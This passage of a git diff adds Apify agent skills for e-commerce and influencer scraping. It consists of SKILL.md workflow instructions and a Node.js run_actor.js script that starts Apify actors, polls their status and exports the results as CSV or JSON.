+ const lines = content.split('\n').filter((line) => line.trim());
+ count = Math.max(0, lines.length - 1);
+ }
+ } catch {
+ count = 'unknown';
+ }
+
+ console.log(`Records: ${count}`);
+ console.log(`Size: ${size.toLocaleString()} bytes`);
+}
+
+// Helper: sleep for ms
+function sleep(ms) {
+ return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
+// Main function
+async function main() {
+ // Parse args first so --help works without token
+ const args = parseCliArgs();
+
+ // Check for APIFY_TOKEN
+ const token = process.env.APIFY_TOKEN;
+ if (!token) {
+ console.error('Error: APIFY_TOKEN not found in .env file');
+ console.error('');
+ console.error('Add your token to .env file:');
+ console.error(' APIFY_TOKEN=your_token_here');
+ console.error('');
+ console.error('Get your token: https://console.apify.com/account/integrations');
+ process.exit(1);
+ }
+
+ // Start the actor run
+ console.log(`Starting actor: ${args.actor}`);
+ const { runId, datasetId } = await startActor(token, args.actor, args.input);
+ console.log(`Run ID: ${runId}`);
+ console.log(`Dataset ID: ${datasetId}`);
+
+ // Poll for completion
+ const status = await pollUntilComplete(token, runId, args.timeout, args.pollInterval);
+
+ if (status !== 'SUCCEEDED') {
+ console.error(`Error: Actor run ${status}`);
+ console.error(`Details: https://console.apify.com/actors/runs/${runId}`);
+ process.exit(1);
+ }
+
+ // Determine output mode
+ if (args.output) {
+ // File output mode
+ await downloadResults(token, datasetId, args.output, args.format);
+ reportSummary(args.output, args.format);
+ } else {
+ // Quick answer mode - display in chat
+ await displayQuickAnswer(token, datasetId);
+ }
+}
+
+main().catch((err) => {
+ console.error(`Error: ${err.message}`);
+ process.exit(1);
+});
diff --git a/web-app/public/skills/apify-ecommerce/SKILL.md b/web-app/public/skills/apify-ecommerce/SKILL.md
new file mode 100644
index 00000000..0e2dc9e6
--- /dev/null
+++ b/web-app/public/skills/apify-ecommerce/SKILL.md
@@ -0,0 +1,263 @@
+---
+name: apify-ecommerce
+description: "Scrape e-commerce data for pricing intelligence, customer reviews, and seller discovery across Amazon, Walmart, eBay, IKEA, and 50+ marketplaces. Use when user asks to monitor prices, track competi..."
+---
+
+# E-commerce Data Extraction
+
+Extract product data, prices, reviews, and seller information from any e-commerce platform using Apify's E-commerce Scraping Tool.
+
+## Prerequisites
+
+- `.env` file with `APIFY_TOKEN` (at `~/.claude/.env`)
+- Node.js 20.6+ (for native `--env-file` support)
+
+## Workflow Selection
+
+| User Need | Workflow | Best For |
+|-----------|----------|----------|
+| Track prices, compare products | Workflow 1: Products & Pricing | Price monitoring, MAP compliance, competitor analysis. Add AI summary for insights. |
+| Analyze reviews (sentiment or quality) | Workflow 2: Reviews | Brand perception, customer sentiment, quality issues, defect patterns |
+| Find sellers across stores | Workflow 3: Sellers | Unauthorized resellers, vendor discovery via Google Shopping |
+
+## Progress Tracking
+
+```
+Task Progress:
+- [ ] Step 1: Select workflow and determine data source
+- [ ] Step 2: Configure Actor input
+- [ ] Step 3: Ask user preferences (format, filename)
+- [ ] Step 4: Run the extraction script
+- [ ] Step 5: Summarize results
+```
+
+---
+
+## Workflow 1: Products & Pricing
+
+**Use case:** Extract product data, prices, and stock status. Track competitor prices, detect MAP violations, benchmark products, or research markets.
+
+**Best for:** Pricing analysts, product managers, market researchers.
+
+### Input Options
+
+| Input Type | Field | Description |
+|------------|-------|-------------|
+| Product URLs | `detailsUrls` | Direct URLs to product pages (use object format) |
+| Category URLs | `listingUrls` | URLs to category/search result pages |
+| Keyword Search | `keyword` + `marketplaces` | Search term across selected marketplaces |
+
+### Example - Product URLs
+```json
+{
+ "detailsUrls": [
+ {"url": "https://www.amazon.com/dp/B09V3KXJPB"},
+ {"url": "https://www.walmart.com/ip/123456789"}
+ ],
+ "additionalProperties": true
+}
+```
+
+### Example - Keyword Search
+```json
+{
+ "keyword": "Samsung Galaxy S24",
+ "marketplaces": ["www.amazon.com", "www.walmart.com"],
+ "additionalProperties": true,
+ "maxProductResults": 50
+}
+```
+
+### Optional: AI Summary
+
+Add these fields to get AI-generated insights:
+
+| Field | Description |
+|-------|-------------|
+| `fieldsToAnalyze` | Data points to analyze: `["name", "offers", "brand", "description"]` |
+| `customPrompt` | Custom analysis instructions |
+
+**Example with AI summary:**
+```json
+{
+ "keyword": "robot vacuum",
+ "marketplaces": ["www.amazon.com"],
+ "maxProductResults": 50,
+ "additionalProperties": true,
+ "fieldsToAnalyze": ["name", "offers", "brand"],
+ "customPrompt": "Summarize price range and identify top brands"
+}
+```
+
+### Output Fields
+- `name` - Product name
+- `url` - Product URL
+- `offers.price` - Current price
+- `offers.priceCurrency` - Currency code (may vary by seller region)
+- `brand.slogan` - Brand name (nested in object)
+- `image` - Product image URL
+- Additional seller/stock info when `additionalProperties: true`
+
+> **Note:** Currency may vary in results even for US searches, as prices reflect different seller regions.
+
+---
+
+## Workflow 2: Customer Reviews
+
+**Use case:** Extract reviews for sentiment analysis, brand perception monitoring, or quality issue detection.
+
+**Best for:** Brand managers, customer experience teams, QA teams, product managers.
+
+### Input Options
+
+| Input Type | Field | Description |
+|------------|-------|-------------|
+| Product URLs | `reviewListingUrls` | Product pages to extract reviews from |
+| Keyword Search | `keywordReviews` + `marketplacesReviews` | Search for product reviews by keyword |
+
+### Example - Extract Reviews from Product
+```json
+{
+ "reviewListingUrls": [
+ {"url": "https://www.amazon.com/dp/B09V3KXJPB"}
+ ],
+ "sortReview": "Most recent",
+ "additionalReviewProperties": true,
+ "maxReviewResults": 500
+}
+```
+
+### Example - Keyword Search
+```json
+{
+ "keywordReviews": "wireless earbuds",
+ "marketplacesReviews": ["www.amazon.com"],
+ "sortReview": "Most recent",
+ "additionalReviewProperties": true,
+ "maxReviewResults": 200
+}
+```
+
+### Sort Options
+- `Most recent` - Latest reviews first (recommended)
+- `Most relevant` - Platform default relevance
+- `Most helpful` - Highest voted reviews
+- `Highest rated` - 5-star reviews first
+- `Lowest rated` - 1-star reviews first
+
+> **Note:** The `sortReview: "Lowest rated"` option may not work consistently across all marketplaces. For quality analysis, collect a large sample and filter by rating in post-processing.
+
+### Quality Analysis Tips
+- Set high `maxReviewResults` for statistical significance
+- Look for recurring keywords: "broke", "defect", "quality", "returned"
+- Filter results by rating if sorting doesn't work as expected
+- Cross-reference with competitor products for benchmarking
+
+---
+
+## Workflow 3: Seller Intelligence
+
+**Use case:** Find sellers across stores, discover unauthorized resellers, evaluate vendor options.
+
+**Best for:** Brand protection teams, procurement, supply chain managers.
+
+> **Note:** This workflow uses Google Shopping to find sellers across stores. Direct seller profile URLs are not reliably supported.
+
+### Input Configuration
+```json
+{
+ "googleShoppingSearchKeyword": "Nike Air Max 90",
+ "scrapeSellersFromGoogleShopping": true,
+ "countryCode": "us",
+ "maxGoogleShoppingSellersPerProduct": 20,
+ "maxGoogleShoppingResults": 100
+}
+```
+
+### Options
+| Field | Description |
+|-------|-------------|
+| `googleShoppingSearchKeyword` | Product name to search |
+| `scrapeSellersFromGoogleShopping` | Set to `true` to extract sellers |
+| `scrapeProductsFromGoogleShopping` | Set to `true` to also extract product details |
+| `countryCode` | Target country (e.g., `us`, `uk`, `de`) |
+| `maxGoogleShoppingSellersPerProduct` | Max sellers per product |
+| `maxGoogleShoppingResults` | Total result limit |
+
+---
+
+## Supported Marketplaces
+
+### Amazon (20+ regions)
+`www.amazon.com`, `www.amazon.co.uk`, `www.amazon.de`, `www.amazon.fr`, `www.amazon.it`, `www.amazon.es`, `www.amazon.ca`, `www.amazon.com.au`, `www.amazon.co.jp`, `www.amazon.in`, `www.amazon.com.br`, `www.amazon.com.mx`, `www.amazon.nl`, `www.amazon.pl`, `www.amazon.se`, `www.amazon.ae`, `www.amazon.sa`, `www.amazon.sg`, `www.amazon.com.tr`, `www.amazon.eg`
+
+### Major US Retailers
+`www.walmart.com`, `www.costco.com`, `www.costco.ca`, `www.homedepot.com`
+
+### European Retailers
+`allegro.pl`, `allegro.cz`, `allegro.sk`, `www.alza.cz`, `www.alza.sk`, `www.alza.de`, `www.alza.at`, `www.alza.hu`, `www.kaufland.de`, `www.kaufland.pl`, `www.kaufland.cz`, `www.kaufland.sk`, `www.kaufland.at`, `www.kaufland.fr`, `www.kaufland.it`, `www.cdiscount.com`
+
+### IKEA (40+ country/language combinations)
+Supports all major IKEA regional sites with multiple language options.
+
+### Google Shopping
+Use for seller discovery across multiple stores.
+
+---
+
+## Running the Extraction
+
+### Step 1: Set Skill Path
+```bash
+SKILL_PATH=~/.claude/skills/apify-ecommerce
+```
+
+### Step 2: Run Script
+
+**Quick answer (display in chat):**
+```bash
+node --env-file=~/.claude/.env $SKILL_PATH/reference/scripts/run_actor.js \
+ --actor "apify/e-commerce-scraping-tool" \
+ --input 'JSON_INPUT'
+```
+
+**CSV export:**
+```bash
+node --env-file=~/.claude/.env $SKILL_PATH/reference/scripts/run_actor.js \
+ --actor "apify/e-commerce-scraping-tool" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_filename.csv \
+ --format csv
+```
+
+**JSON export:**
+```bash
+node --env-file=~/.claude/.env $SKILL_PATH/reference/scripts/run_actor.js \
+ --actor "apify/e-commerce-scraping-tool" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_filename.json \
+ --format json
+```
+
+### Step 3: Summarize Results
+
+Report:
+- Number of items extracted
+- File location (if exported)
+- Key insights based on workflow:
+ - **Products:** Price range, outliers, MAP violations
+ - **Reviews:** Average rating, sentiment trends, quality issues
+ - **Sellers:** Seller count, unauthorized sellers found
+
+---
+
+## Error Handling
+
+| Error | Solution |
+|-------|----------|
+| `APIFY_TOKEN not found` | Ensure `~/.claude/.env` contains `APIFY_TOKEN=your_token` |
+| `Actor not found` | Verify Actor ID: `apify/e-commerce-scraping-tool` |
+| `Run FAILED` | Check Apify console link in error output |
+| `Timeout` | Reduce `maxProductResults` or increase `--timeout` |
+| `No results` | Verify URLs are valid and accessible |
+| `Invalid marketplace` | Check marketplace value matches supported list exactly |
diff --git a/web-app/public/skills/apify-ecommerce/reference/scripts/package.json b/web-app/public/skills/apify-ecommerce/reference/scripts/package.json
new file mode 100644
index 00000000..3dbc1ca5
--- /dev/null
+++ b/web-app/public/skills/apify-ecommerce/reference/scripts/package.json
@@ -0,0 +1,3 @@
+{
+ "type": "module"
+}
diff --git a/web-app/public/skills/apify-ecommerce/reference/scripts/run_actor.js b/web-app/public/skills/apify-ecommerce/reference/scripts/run_actor.js
new file mode 100644
index 00000000..9c67d2ea
--- /dev/null
+++ b/web-app/public/skills/apify-ecommerce/reference/scripts/run_actor.js
@@ -0,0 +1,369 @@
+#!/usr/bin/env node
+/**
+ * Apify Actor Runner - Runs Apify actors and exports results.
+ *
+ * Usage:
+ * # Quick answer (display in chat, no file saved)
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+ *
+ * # Export to file
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}' --output data.csv --format csv
+ */
+
+import { parseArgs } from 'node:util';
+import { writeFileSync, statSync } from 'node:fs';
+
+// User-Agent for tracking skill usage in Apify analytics
+const USER_AGENT = 'apify-agent-skills/apify-ecommerce-1.0.0';
+
+// Parse command-line arguments
+function parseCliArgs() {
+ const options = {
+ actor: { type: 'string', short: 'a' },
+ input: { type: 'string', short: 'i' },
+ output: { type: 'string', short: 'o' },
+ format: { type: 'string', short: 'f', default: 'csv' },
+ timeout: { type: 'string', short: 't', default: '600' },
+ 'poll-interval': { type: 'string', default: '5' },
+ help: { type: 'boolean', short: 'h' },
+ };
+
+ const { values } = parseArgs({ options, allowPositionals: false });
+
+ if (values.help) {
+ printHelp();
+ process.exit(0);
+ }
+
+ if (!values.actor) {
+ console.error('Error: --actor is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ if (!values.input) {
+ console.error('Error: --input is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ return {
+ actor: values.actor,
+ input: values.input,
+ output: values.output,
+ format: values.format || 'csv',
+ timeout: parseInt(values.timeout, 10),
+ pollInterval: parseInt(values['poll-interval'], 10),
+ };
+}
+
+function printHelp() {
+ console.log(`
+Apify Actor Runner - Run Apify actors and export results
+
+Usage:
+ node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+
+Options:
+ --actor, -a Actor ID (e.g., apify/e-commerce-scraping-tool) [required]
+ --input, -i Actor input as JSON string [required]
+ --output, -o Output file path (optional - if not provided, displays quick answer)
+ --format, -f Output format: csv, json (default: csv)
+ --timeout, -t Max wait time in seconds (default: 600)
+ --poll-interval Seconds between status checks (default: 5)
+ --help, -h Show this help message
+
+Output Formats:
+ JSON (all data) --output file.json --format json
+ CSV (all data) --output file.csv --format csv
+ Quick answer (no --output) - displays top 5 in chat
+
+Examples:
+ # Quick answer - display top 5 products
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "apify/e-commerce-scraping-tool" \\
+ --input '{"keyword": "bluetooth headphones", "marketplaces": ["www.amazon.com"], "maxProductResults": 10}'
+
+ # Export prices to CSV
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "apify/e-commerce-scraping-tool" \\
+ --input '{"detailsUrls": ["https://amazon.com/dp/B09V3KXJPB"]}' \\
+ --output prices.csv --format csv
+
+ # Export reviews to JSON
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "apify/e-commerce-scraping-tool" \\
+ --input '{"reviewListingUrls": ["https://amazon.com/dp/B09V3KXJPB"], "maxReviewResults": 100}' \\
+ --output reviews.json --format json
+`);
+}
+
+// Start an actor run and return { runId, datasetId }
+async function startActor(token, actorId, inputJson) {
+ // Convert "author/actor" format to "author~actor" for API compatibility
+ const apiActorId = actorId.replace('/', '~');
+ const url = `https://api.apify.com/v2/acts/${apiActorId}/runs?token=${encodeURIComponent(token)}`;
+
+ let data;
+ try {
+ data = JSON.parse(inputJson);
+ } catch (e) {
+ console.error(`Error: Invalid JSON input: ${e.message}`);
+ process.exit(1);
+ }
+
+ const response = await fetch(url, {
+ method: 'POST',
+ headers: {
+ 'Content-Type': 'application/json',
+ 'User-Agent': `${USER_AGENT}/start_actor`,
+ },
+ body: JSON.stringify(data),
+ });
+
+ if (response.status === 404) {
+ console.error(`Error: Actor '${actorId}' not found`);
+ process.exit(1);
+ }
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: API request failed (${response.status}): ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ return {
+ runId: result.data.id,
+ datasetId: result.data.defaultDatasetId,
+ };
+}
+
+// Poll run status until complete or timeout
+async function pollUntilComplete(token, runId, timeout, interval) {
+ const url = `https://api.apify.com/v2/actor-runs/${runId}?token=${encodeURIComponent(token)}`;
+ const startTime = Date.now();
+ let lastStatus = null;
+
+ while (true) {
+ const response = await fetch(url);
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to get run status: ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ const status = result.data.status;
+
+ // Only print when status changes
+ if (status !== lastStatus) {
+ console.log(`Status: ${status}`);
+ lastStatus = status;
+ }
+
+ if (['SUCCEEDED', 'FAILED', 'ABORTED', 'TIMED-OUT'].includes(status)) {
+ return status;
+ }
+
+ const elapsed = (Date.now() - startTime) / 1000;
+ if (elapsed > timeout) {
+ console.error(`Warning: Timeout after ${timeout}s, actor still running`);
+ return 'TIMED-OUT';
+ }
+
+ await sleep(interval * 1000);
+ }
+}
+
+// Download dataset items
+async function downloadResults(token, datasetId, outputPath, format) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/download_${format}`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+
+ if (format === 'json') {
+ writeFileSync(outputPath, JSON.stringify(data, null, 2));
+ } else {
+ // CSV output
+ if (data.length > 0) {
+ const fieldnames = Object.keys(data[0]);
+ const csvLines = [fieldnames.join(',')];
+
+ for (const row of data) {
+ const values = fieldnames.map((key) => {
+ let value = row[key];
+
+ // Truncate long text fields
+ if (typeof value === 'string' && value.length > 200) {
+ value = value.slice(0, 200) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ value = JSON.stringify(value) || '';
+ }
+
+ // CSV escape: wrap in quotes if contains comma, quote, or newline
+ if (value === null || value === undefined) {
+ return '';
+ }
+ const strValue = String(value);
+ if (strValue.includes(',') || strValue.includes('"') || strValue.includes('\n')) {
+ return `"${strValue.replace(/"/g, '""')}"`;
+ }
+ return strValue;
+ });
+ csvLines.push(values.join(','));
+ }
+
+ writeFileSync(outputPath, csvLines.join('\n'));
+ } else {
+ writeFileSync(outputPath, '');
+ }
+ }
+
+ console.log(`Saved to: ${outputPath}`);
+}
+
+// Display top 5 results in chat format
+async function displayQuickAnswer(token, datasetId) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/quick_answer`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+ const total = data.length;
+
+ if (total === 0) {
+ console.log('\nNo results found.');
+ return;
+ }
+
+ // Display top 5
+ console.log(`\n${'='.repeat(60)}`);
+ console.log(`TOP 5 RESULTS (of ${total} total)`);
+ console.log('='.repeat(60));
+
+ for (let i = 0; i < Math.min(5, data.length); i++) {
+ const item = data[i];
+ console.log(`\n--- Result ${i + 1} ---`);
+
+ for (const [key, value] of Object.entries(item)) {
+ let displayValue = value;
+
+ // Truncate long values
+ if (typeof value === 'string' && value.length > 100) {
+ displayValue = value.slice(0, 100) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ const jsonStr = JSON.stringify(value);
+ displayValue = jsonStr.length > 100 ? jsonStr.slice(0, 100) + '...' : jsonStr;
+ }
+
+ console.log(` ${key}: ${displayValue}`);
+ }
+ }
+
+ console.log(`\n${'='.repeat(60)}`);
+ if (total > 5) {
+ console.log(`Showing 5 of ${total} results.`);
+ }
+ console.log(`Full data available at: https://console.apify.com/storage/datasets/${datasetId}`);
+ console.log('='.repeat(60));
+}
+
+// Report summary of downloaded data
+function reportSummary(outputPath, format) {
+ const stats = statSync(outputPath);
+ const size = stats.size;
+
+ let count;
+ try {
+ const content = require('fs').readFileSync(outputPath, 'utf-8');
+ if (format === 'json') {
+ const data = JSON.parse(content);
+ count = Array.isArray(data) ? data.length : 1;
+ } else {
+ // CSV - count lines minus header
+ const lines = content.split('\n').filter((line) => line.trim());
+ count = Math.max(0, lines.length - 1);
+ }
+ } catch {
+ count = 'unknown';
+ }
+
+ console.log(`Records: ${count}`);
+ console.log(`Size: ${size.toLocaleString()} bytes`);
+}
+
+// Helper: sleep for ms
+function sleep(ms) {
+ return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
+// Main function
+async function main() {
+ // Parse args first so --help works without token
+ const args = parseCliArgs();
+
+ // Check for APIFY_TOKEN
+ const token = process.env.APIFY_TOKEN;
+ if (!token) {
+ console.error('Error: APIFY_TOKEN not found in .env file');
+ console.error('');
+ console.error('Add your token to .env file:');
+ console.error(' APIFY_TOKEN=your_token_here');
+ console.error('');
+ console.error('Get your token: https://console.apify.com/account/integrations');
+ process.exit(1);
+ }
+
+ // Start the actor run
+ console.log(`Starting actor: ${args.actor}`);
+ const { runId, datasetId } = await startActor(token, args.actor, args.input);
+ console.log(`Run ID: ${runId}`);
+ console.log(`Dataset ID: ${datasetId}`);
+
+ // Poll for completion
+ const status = await pollUntilComplete(token, runId, args.timeout, args.pollInterval);
+
+ if (status !== 'SUCCEEDED') {
+ console.error(`Error: Actor run ${status}`);
+ console.error(`Details: https://console.apify.com/actors/runs/${runId}`);
+ process.exit(1);
+ }
+
+ // Determine output mode
+ if (args.output) {
+ // File output mode
+ await downloadResults(token, datasetId, args.output, args.format);
+ reportSummary(args.output, args.format);
+ } else {
+ // Quick answer mode - display in chat
+ await displayQuickAnswer(token, datasetId);
+ }
+}
+
+main().catch((err) => {
+ console.error(`Error: ${err.message}`);
+ process.exit(1);
+});
diff --git a/web-app/public/skills/apify-influencer-discovery/SKILL.md b/web-app/public/skills/apify-influencer-discovery/SKILL.md
new file mode 100644
index 00000000..12404a0b
--- /dev/null
+++ b/web-app/public/skills/apify-influencer-discovery/SKILL.md
@@ -0,0 +1,118 @@
+---
+name: apify-influencer-discovery
+description: Find and evaluate influencers for brand partnerships, verify authenticity, and track collaboration performance across Instagram, Facebook, YouTube, and TikTok.
+---
+
+# Influencer Discovery
+
+Discover and analyze influencers across multiple platforms using Apify Actors.
+
+## Prerequisites
+(No need to check it upfront)
+
+- `.env` file with `APIFY_TOKEN`
+- Node.js 20.6+ (for native `--env-file` support)
+- `mcpc` CLI tool: `npm install -g @apify/mcpc`
+
+## Workflow
+
+Copy this checklist and track progress:
+
+```
+Task Progress:
+- [ ] Step 1: Determine discovery source (select Actor)
+- [ ] Step 2: Fetch Actor schema via mcpc
+- [ ] Step 3: Ask user preferences (format, filename)
+- [ ] Step 4: Run the discovery script
+- [ ] Step 5: Summarize results
+```
+
+### Step 1: Determine Discovery Source
+
+Select the appropriate Actor based on user needs:
+
+| User Need | Actor ID | Best For |
+|-----------|----------|----------|
+| Influencer profiles | `apify/instagram-profile-scraper` | Profile metrics, bio, follower counts |
+| Find by hashtag | `apify/instagram-hashtag-scraper` | Discover influencers using specific hashtags |
+| Reel engagement | `apify/instagram-reel-scraper` | Analyze reel performance and engagement |
+| Discovery by niche | `apify/instagram-search-scraper` | Search for influencers by keyword/niche |
+| Brand mentions | `apify/instagram-tagged-scraper` | Track who tags brands/products |
+| Comprehensive data | `apify/instagram-scraper` | Full profile, posts, comments analysis |
+| API-based discovery | `apify/instagram-api-scraper` | Fast API-based data extraction |
+| Engagement analysis | `apify/export-instagram-comments-posts` | Export comments for sentiment analysis |
+| Facebook content | `apify/facebook-posts-scraper` | Analyze Facebook post performance |
+| Micro-influencers | `apify/facebook-groups-scraper` | Find influencers in niche groups |
+| Influential pages | `apify/facebook-search-scraper` | Search for influential pages |
+| YouTube creators | `streamers/youtube-channel-scraper` | Channel metrics and subscriber data |
+| TikTok influencers | `clockworks/tiktok-scraper` | Comprehensive TikTok data extraction |
+| TikTok (free) | `clockworks/free-tiktok-scraper` | Free TikTok data extractor |
+| Live streamers | `clockworks/tiktok-live-scraper` | Discover live streaming influencers |
+
+### Step 2: Fetch Actor Schema
+
+Fetch the Actor's input schema and details dynamically using mcpc:
+
+```bash
+export $(grep APIFY_TOKEN .env | xargs) && mcpc --json mcp.apify.com --header "Authorization: Bearer $APIFY_TOKEN" tools-call fetch-actor-details actor:="ACTOR_ID" | jq -r ".content"
+```
+
+Replace `ACTOR_ID` with the selected Actor (e.g., `apify/instagram-profile-scraper`).
+
+This returns:
+- Actor description and README
+- Required and optional input parameters
+- Output fields (if available)
+
+### Step 3: Ask User Preferences
+
+Before running, ask:
+1. **Output format**:
+ - **Quick answer** - Display top few results in chat (no file saved)
+ - **CSV** - Full export with all fields
+ - **JSON** - Full export in JSON format
+2. **Number of results**: Based on character of use case
+
+### Step 4: Run the Script
+
+**Quick answer (display in chat, no file):**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT'
+```
+
+**CSV:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.csv \
+ --format csv
+```
+
+**JSON:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.json \
+ --format json
+```
+
+### Step 5: Summarize Results
+
+After completion, report:
+- Number of influencers found
+- File location and name
+- Key metrics available (followers, engagement rate, etc.)
+- Suggested next steps (filtering, outreach, deeper analysis)
+
+
+## Error Handling
+
+`APIFY_TOKEN not found` - Ask user to create `.env` with `APIFY_TOKEN=your_token`
+`mcpc not found` - Ask user to install `npm install -g @apify/mcpc`
+`Actor not found` - Check Actor ID spelling
+`Run FAILED` - Ask user to check Apify console link in error output
+`Timeout` - Reduce input size or increase `--timeout`
diff --git a/web-app/public/skills/apify-influencer-discovery/reference/scripts/run_actor.js b/web-app/public/skills/apify-influencer-discovery/reference/scripts/run_actor.js
new file mode 100644
index 00000000..e600ded2
--- /dev/null
+++ b/web-app/public/skills/apify-influencer-discovery/reference/scripts/run_actor.js
@@ -0,0 +1,363 @@
+#!/usr/bin/env node
+/**
+ * Apify Actor Runner - Runs Apify actors and exports results.
+ *
+ * Usage:
+ * # Quick answer (display in chat, no file saved)
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+ *
+ * # Export to file
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}' --output leads.csv --format csv
+ */
+
+import { parseArgs } from 'node:util';
+import { writeFileSync, statSync } from 'node:fs';
+
+// User-Agent for tracking skill usage in Apify analytics
+const USER_AGENT = 'apify-agent-skills/apify-influencer-discovery-1.0.0';
+
+// Parse command-line arguments
+function parseCliArgs() {
+ const options = {
+ actor: { type: 'string', short: 'a' },
+ input: { type: 'string', short: 'i' },
+ output: { type: 'string', short: 'o' },
+ format: { type: 'string', short: 'f', default: 'csv' },
+ timeout: { type: 'string', short: 't', default: '600' },
+ 'poll-interval': { type: 'string', default: '5' },
+ help: { type: 'boolean', short: 'h' },
+ };
+
+ const { values } = parseArgs({ options, allowPositionals: false });
+
+ if (values.help) {
+ printHelp();
+ process.exit(0);
+ }
+
+ if (!values.actor) {
+ console.error('Error: --actor is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ if (!values.input) {
+ console.error('Error: --input is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ return {
+ actor: values.actor,
+ input: values.input,
+ output: values.output,
+ format: values.format || 'csv',
+ timeout: parseInt(values.timeout, 10),
+ pollInterval: parseInt(values['poll-interval'], 10),
+ };
+}
+
+function printHelp() {
+ console.log(`
+Apify Actor Runner - Run Apify actors and export results
+
+Usage:
+ node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+
+Options:
+ --actor, -a Actor ID (e.g., compass/crawler-google-places) [required]
+ --input, -i Actor input as JSON string [required]
+ --output, -o Output file path (optional - if not provided, displays quick answer)
+ --format, -f Output format: csv, json (default: csv)
+ --timeout, -t Max wait time in seconds (default: 600)
+ --poll-interval Seconds between status checks (default: 5)
+ --help, -h Show this help message
+
+Output Formats:
+ JSON (all data) --output file.json --format json
+ CSV (all data) --output file.csv --format csv
+ Quick answer (no --output) - displays top 5 in chat
+
+Examples:
+ # Quick answer - display top 5 in chat
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}'
+
+ # Export all data to CSV
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}' \\
+ --output leads.csv --format csv
+`);
+}
+
+// Start an actor run and return { runId, datasetId }
+async function startActor(token, actorId, inputJson) {
+ // Convert "author/actor" format to "author~actor" for API compatibility
+ const apiActorId = actorId.replace('/', '~');
+ const url = `https://api.apify.com/v2/acts/${apiActorId}/runs?token=${encodeURIComponent(token)}`;
+
+ let data;
+ try {
+ data = JSON.parse(inputJson);
+ } catch (e) {
+ console.error(`Error: Invalid JSON input: ${e.message}`);
+ process.exit(1);
+ }
+
+ const response = await fetch(url, {
+ method: 'POST',
+ headers: {
+ 'Content-Type': 'application/json',
+ 'User-Agent': `${USER_AGENT}/start_actor`,
+ },
+ body: JSON.stringify(data),
+ });
+
+ if (response.status === 404) {
+ console.error(`Error: Actor '${actorId}' not found`);
+ process.exit(1);
+ }
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: API request failed (${response.status}): ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ return {
+ runId: result.data.id,
+ datasetId: result.data.defaultDatasetId,
+ };
+}
+
+// Poll run status until complete or timeout
+async function pollUntilComplete(token, runId, timeout, interval) {
+ const url = `https://api.apify.com/v2/actor-runs/${runId}?token=${encodeURIComponent(token)}`;
+ const startTime = Date.now();
+ let lastStatus = null;
+
+ while (true) {
+ const response = await fetch(url);
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to get run status: ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ const status = result.data.status;
+
+ // Only print when status changes
+ if (status !== lastStatus) {
+ console.log(`Status: ${status}`);
+ lastStatus = status;
+ }
+
+ if (['SUCCEEDED', 'FAILED', 'ABORTED', 'TIMED-OUT'].includes(status)) {
+ return status;
+ }
+
+ const elapsed = (Date.now() - startTime) / 1000;
+ if (elapsed > timeout) {
+ console.error(`Warning: Timeout after ${timeout}s, actor still running`);
+ return 'TIMED-OUT';
+ }
+
+ await sleep(interval * 1000);
+ }
+}
+
+// Download dataset items
+async function downloadResults(token, datasetId, outputPath, format) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/download_${format}`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
